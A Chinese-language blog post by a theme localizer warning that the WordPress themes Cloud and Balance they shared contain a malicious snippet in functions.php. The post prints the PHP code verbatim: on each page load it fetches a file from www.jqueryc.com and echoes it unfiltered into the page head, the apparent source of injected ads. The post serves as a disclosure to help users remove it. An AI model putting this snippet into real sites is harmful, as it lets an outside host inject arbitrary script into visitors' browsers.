近日有网友反映balance这款主题页面上出现如下错误信息
Not Found The requested URL /jquery-1.6.3.min.js was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache/2 Server at www.jqueryc.com Port 80
我看了下,在主题文件下functions.php找到了相关代码
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
一开始我以为是www.jqueryc.com这个存放jquery的网站删除了旧版本的jquery-1.6.3.min.js,毕竟洛米的代码能力比较弱,以前没看出什么问题。后来我对照其他yoo主题,发现其他主题并没有这段代码,只有个别主题有,我删除了这段代码,发现对主题没有任何影响,于是我基本可以断定这是段恶意代码了。难怪我之前用cloud主题时偶尔会蹦出广告来,我还以为是浏览器出问题了!
在这里我也向大家道歉,下载的主题上有恶意代码我没有发现就分享给大家了,以后发布的主题一定认真检查一遍。我仔细检查了我汉化的所有yoo主题,发现以下主题存在恶意代码,请安装以下主题的朋友抓紧删除我上面所说的恶意代码!
[fancylist]
-
Cloud
-
Balance
[/fancylist]